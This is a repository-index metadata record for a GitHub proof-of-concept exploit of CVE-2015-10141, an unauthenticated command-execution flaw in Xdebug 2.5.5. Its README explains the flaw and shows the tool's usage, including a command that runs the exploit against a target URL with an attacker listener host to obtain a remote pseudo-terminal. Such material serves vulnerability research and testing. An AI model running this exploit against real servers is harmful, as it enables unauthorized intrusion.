{"id":30294508,"url":"https://github.com/d3ext/cve-2015-10141","last_synced_at":"2025-08-17T01:35:24.805Z","repository":{"id":41803335,"uuid":"510351282","full_name":"D3Ext/CVE-2015-10141","owner":"D3Ext","description":"POC exploit for CVE-2015-10141","archived":false,"fork":false,"pushed_at":"2025-08-11T15:11:04.000Z","size":59,"stargazers_count":30,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-08-14T07:48:53.875Z","etag":null,"topics":["cve-2015-10141","python"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-07-04T12:30:17.000Z","updated_at":"2025-08-11T15:31:04.000Z","dependencies_parsed_at":"2025-04-10T03:17:44.738Z","dependency_job_id":"40d2cf62-f896-4260-a510-4d20608e2860","html_url":"https://github.com/D3Ext/CVE-2015-10141","commit_stats":null,"previous_names":["d3ext/xdebug-exploit"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/D3Ext/CVE-2015-10141","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/manifests","owner_url":"https://repos.ecosyste.ms/api
/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/CVE-2015-10141/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270796216,"owners_count":24647319,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-16T02:00:11.002Z","response_time":91,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2015-10141","python"],"created_at":"2025-08-17T01:35:18.019Z","updated_at":"2025-08-17T01:35:24.760Z","avatar_url":"https://github.com/D3Ext.png","language":"Python","readme":"# CVE-2015-10141\n\n```\n# Exploit Title: xdebug Unauthenticated Command Execution\n# Exploit Author: D3Ext\n# Vendor Homepage: https://xdebug.org/\n# Software Link: https://pecl.php.net/package/xdebug/2.5.5/windows\n# Version: 2.5.5\n# Tested on: Kali Linux 2025\n# CVE: CVE-2015-10141\n```\n\n## Explanation\n\nAn unauthenticated OS command injection vulnerability exists in Xdebug, a PHP debugging extension, in versions 2.5.5 and earlier. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). 
This results in full compromise of the host under the privileges of the web server user.\n\n## Usage\n\n```\nusage: CVE-2015-10141.py [-h] -u URL -l LHOST\n\nCVE-2015-10141 - xdebug v2.5.5 RCE Exploit\n\noptions:\n  -h, --help         show this help message and exit\n  -u, --url URL      URL of the target\n  -l, --lhost LHOST  LHOST to trigger the RCE\n```\n\nJust execute the exploit and provide a valid URL with a PHP file like `index.php` and the local host. Then the exploit will try to establish a pseudo-terminal which allows you to execute commands remotely.\n\n```sh\npython3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3\n```\n\nTake into account that in some cases the output won't be reflected at all and you will only see the first line of the executed command. This is not a problem with the script; the vulnerability works this way.\n\n## References\n\n```\nhttps://github.com/advisories/GHSA-267w-63f8-m896\nhttps://www.exploit-db.com/exploits/44568\nhttps://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/\nhttps://nvd.nist.gov/vuln/detail/CVE-2015-10141\nhttps://www.wiz.io/vulnerability-database/cve/cve-2015-10141\nhttps://feedly.com/cve/CVE-2015-10141\nhttps://www.tenable.com/plugins/nessus/112210\n```\n\n## License\n\nThis project is under the MIT license.\n\nCopyright © 2025, *D3Ext*\n\n\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2015-10141","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fcve-2015-10141","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2015-10141/lists"}